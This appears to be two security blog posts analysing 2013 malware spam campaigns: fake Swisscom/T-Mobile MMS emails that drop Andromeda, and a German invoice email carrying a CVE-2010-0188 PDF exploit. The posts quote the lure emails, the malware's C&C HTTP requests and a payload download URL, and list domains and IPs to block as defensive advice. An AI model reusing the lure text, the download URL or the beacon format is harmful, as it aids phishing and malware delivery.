Fake Swisscom And T-Mobile Emails Hitting CH and DE

This morning I’ve spotted two spam campaigns hitting German and Swiss internet users, by abusing the name and reputation of two well known players in the telephone sector: Swisscom (CH) and T-Mobile (DE).

Below is a spam sample that has been sent out by the Cutwail spam botnet this morning hitting Swiss internet users:

From: noreply@swisscom.ch
To: spamtrap
Subject: MMS

Description: Swiss Telecom

Telefonnummer +41*random-number*

Wenn der Adressat ein MMS nicht empfangen kann (weil er kein MMS-fähiges Handy hat oder wenn mit seinem Netzanbieter keine MMS ausgetauscht werden können) erhält er ein SMS mit einer MMS-ID. Auf der Website von Swisscom kann er das MMS mit dieser MMS-ID abrufen.

It’s an HTML email that embeds the Swisscom-Logo:

Screenshot Spammail

The email is written in German and says that if the recipient gets an MMS and his mobile phone isn’t able to display MMS or his network provider doesn’t support it, he will get an SMS with an MMS-ID. The receipient can enter this MMS-ID on the Swisscom website to view the MMS he just has received. If you Google that text you will notice that the criminals just copied that text from Swisscom’s official website:

http://www.swisscom.ch/de/privatkunden/hilfe/loesung/dienste-im-ausland-nutzen.html

The spam email has a ZIP-Archive (MMSXXXXX.zip) attached that contains a Windows executable (.exe) infected with Andromeda (also known as Gamarue):

Filename: MMS-XXXXXXXX.JPEG.exe
Filesize: 30’724 bytes
MD5 hash: 2c1a7509b389858310ffbc72ee64d501
Virustotal: 20 / 45

Once the recipient executes the Windows executable, the Trojan installs itself into the profile of All Users:

C:\Documents and Settings\All Users\dxalrjtj.exe

Andromeda/Gamarue uses some anti-VM mechanism to make sure that it only gets executed on a physical system. As soon as the Trojan infected the victims machine, it starts to communicate with the botnet C&C using the HTTP protocol:

POST /soap.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: ophia.ru
Content-Length: 80
Cache-Control: no-cache
Pragma: no-cache

*encrypted-data*

The botnet C&C server is located at ophia.ru which is registered through a Russian based domain registrar called “NAUNET”:

domain: OPHIA.RU
nserver: ns1.menorca24.com.
nserver: ns1.nextbookz.com.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created: 2012.12.10
paid-till: 2013.12.10
free-date: 2014.01.10
source: TCI

The domain name has several A records:

59.167.122.56 [ppp59-167-122-56.static.internode.on.net.]
101.99.23.176 [static.cmcti.vn.]
2.229.105.130 [2-229-105-130.ip196.fastwebnet.it.]
177.71.251.208 [ec2-177-71-251-208.sa-east-1.compute.amazonaws.com.]
185.12.5.106 [host-106-5-12-185.cloudsigma.com.]

Googling for the mentioned botnet C&C domain will reveal an interesting forum post on Trojaner-board.de. Obviously the criminals sent out a similar spam campaign today targeting German internet users, by abuse T-Mobile’s brand. The attackers used a different subject line and email body, but sent out the same malicious file (MD5 hash: 2c1a7509b389858310ffbc72ee64d501).

Fortunately, I’ve some good news for you: All these spam emails I’ve seen hitting my spamtraps today have been blocked by Spamhaus ZEN. So if your spamfilter is checking the sending IP address of an email against ZEN, most of these spam emails should have been blocked. Secondly, Swisscom did their homework and already published an SPF record for their domain name swisscom.ch a long time ago:

$ dig +short swisscom.ch TXT
“v=spf1 ip4:193.222.81.0/24 -all”

If your spamfilter is configured to check the SPF record of the sending domain, all these spam messages should have been rejected on your email gateway.

To mitigate this threat, you should ensure that you:

  • Check incoming emails against Spamhaus ZEN
  • Enable SPF checking on your spamfilter / email gateway
  • Block the botnet C&C domain name and the associated IP addresses (see below)
  • configure your clients to show file extensions for known file types (MMS-XXX.jpg.exe)

Associated domain names / IP addresses to block on your firewall / gateway:

130.255.190.43
59.167.122.56
101.99.23.176
2.229.105.130
177.71.251.208
185.12.5.106
advstar.com
alfila.net
arbeitdeutschland.com
arteexotica.net
bestjobcousa.com
bestjobscousa.com
careerabroadinfo.com
dacortaorlando.net
encounterkaspe.pl
establishingwi.su
eyesee-lazere.pl
fearedembracin.su
flavoured.pl
followupdebate.pl
garbagethiever.su
gellax.com
goldenpick.net
greecexpatjobs.com
hemon.pl
hotlane.net
htimemanagemen.su
jobbcanada.com
jobbinamsterdam.com
lombrisa.com
machinelikeleb.su
menorca24.com
mickmalones.com
monitoreddream.su
moteasingwold.net
neo-conned.net
netfest.pl
nextbookz.com
ophia.ru
oracleutilities.net
portugaleuropa.com
purchasingdril.su
simsapprentice.pl
sppleiconicana.su
srichkeylogger.su
technojobse.com
theirspentawar.pl
thelocalsejobs.com
three-property.net
turismingeorgia.net
unpackcenterpi.su
upkeepfilesyst.su
westors.com
youpolandjobs.com
yourcareerbuilders.com

Malware Spreads Through Malicious PDF Attachments

When I blog about spam campaigns that are spreading malware, the malware is usually being spread through a malicious email attachment. Mostly, the attachment is a ZIP-Archive that contains the Trojan as executable file (file extension .exe). This is an old schema used by many cybercriminals for years but I have to admit that they are still quite successful in infecting new victims. To mitigate such threats, many organisations block or reject any email that contains an executable file (.exe) or an ZIP-Archive with an executable on their email gateway / spam filter. You do so as well? You think you are safe? Unfortunately, I do have some bad news for you.

Today I was quite surprised when I got the following spam email on one of my spamtraps:

From: agassi92@gmx.de
To: spamtrap
Subject: =?utf-8?q?Abmahnung f=C3=BCr firstname lastname 04.03.2013?=
Date: Mon, 4 Mar 2013 16:48:21 GMT

Sehr geehrter Kunde X X,

im heutigen Gesch=C3=A4ftsleben hat man =E2=80=9Eviel um die Ohren=E2=80=9C=
und muss an eine Menge Dinge gleichzeitig denken. Dass einem dabei mal etw=
as entgehen kann ist ganz nat=C3=BCrlich. Soeben konnte unsere Buchhaltung =
bez=C3=BCglich der angeh=C3=A4ngten Rechnung noch keinen Zahlungseingang er=
sehen.=20

Datum: 13.01.2013 best=C3=A4tigt von
Offene Rechnung: 448,75 Euro
Bestellnummer: 100687844
Mahnkosten: 4,00 Euro

Sofern Ihrer Aufmerksamkeit unsere Rechnung entgangen ist, haben wir Ihnen =
eine Kopie der Rechnung beigef=C3=BCgt. Wir bitten Sie, die Zahlung nachzuh=
olen und sehen dem Eingang Ihrer Zahlung bis zum 04.03.2013 entgegen. Falls=
Sie den genannten Termin nicht einhalten, werden wir Ihnen weitere Verzugs=
zinsen und Mahnkosten berechnen.

Sollte der angemahnte Betrag nicht fristgerecht bei uns gebucht werden, wer=
den wir ohne weitere Schreiben unseren Rechtsanwalt mit der Klageerhebung b=
eauftragen.=20

Mit bestem Dank f=C3=BCr Ihr Vertrauen in Conrad Electronic Dominik Krause

One of the things that I noticed immediately is that the email has a clean language which is quite uncommon for such spam campaigns (it is written in German and hence most likely targeting German speaking countries exclusively). Another thing that I noticed is that the email didn’t got blocked by the my spamfilter. While looking into it, I noticed that the spam mail had a very low spam score which is based on the fact that the sending IP address isn’t blacklisted on any blacklist (DNSBL). I’m not surprised because the sending IP address is actually one of GMX’s outbound email gateways:

Received: from mout-xforward.gmx.net (mout-xforward.gmx.net [82.165.159.41])
by spamtrap (X) with ESMTP id X
for spamtrap; Mon, 4 Mar 2013 16:49:03 +0000 (UTC)

For those who don’t know GMX: It’s a large free email service provider in Germany owned by 1&1. So you shouldn’t block their outbound email servers. What the criminals obviously did is using stolen SMTP credentials to send out their spam campaign.

The spam email contains a malicious PDF attachment using the first- and lastname of the recipient (victim):

Filename: Mahnung X X.pdf
File size: 9’514 bytes
Virustotal: 1 / 46

The AV detection rate is very poor, only one out of 46 AV vendors currently provides a detection against this threat (Microsoft – Exploit:Win32/CVE-2010-0188). The PDF exploits a well known vulnerability in Adobe Reader that allows remote code execution. The vulnerability was already addressed by Adobe in 2010.

If the Adobe version installed on the victims computer isn’t up to date, the malicious PDF will exploit CVE-2010-0188 and downloads the malware itself from seodirect-proxy.com:

URL: http://seodirect-proxy.com/adobe-update.exe
Filename: adobe-update.exe
Filesize: 73’728 bytes
Virustotal: 3 / 46

Unfortunately, most AV-vendors fail on this file as well. Only 3 AV-vendors currently provides a detection for it (well done ESET, Kasperksy and Malwarebytes). The file is temporary being stored in the following location:

C:\Document and Settings\USERNAME\Local Settings\Temp\wpbt0.dll

Afterwards the malware installs itself into a random directory with a random filename in the victims user profile, for example:

C:\Document and Settings\USERNAME\Hyrrayn\uisdoxtmjkl.exe (same file as wpbt0.dll)
C:\Document and Settings\USERNAME\Local Settings\Temp\otnhhyskui.pre (same file as wpbt0.dll)

Once the victims computer has been successfully infected, the malware contacts a botnet C&C hosted at zeouk-gt.com:

GET /typo3.php?ltype=ld&ccr=1&id=XXX&stat=0&ver=XXX&loc=XXX&os=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: zeouk-gt.com
Connection: Keep-Alive
Cache-Control: no-cache

The User-Agent string seems to be hardcoded in the binary and is using an exotic (and I believe no longer used) version of Microsoft Internet Explorer (MSIE 6.0b).

To mitigate this threat, I recommend you to:

  • Create an IDS rule that spots the user-agent used by this malware
  • Patch Adobe Reader
  • Block the associated malware distribution site / botnet C&C (see list below)

Malicious domain names / IP addresses used or related in this malware campaign (I highly recommend you to block those):

bnamecorni.com
flash-mini-sp3.com
kcrio-oum.com
mydkarsy.com
namelesscorn.net
openwebspace-apo.com
porkystory.net
proscitomash.com
seldomname.com
senesamj.com
seodirect-proxy.com
sort-storymv.com
uawxaeneh.com
usergateproxy.net
zeouk-gt.com
101.99.23.176
54.248.20.255
151.155.24.150
173.231.39.70



economics-recluse
Scene
Urgent!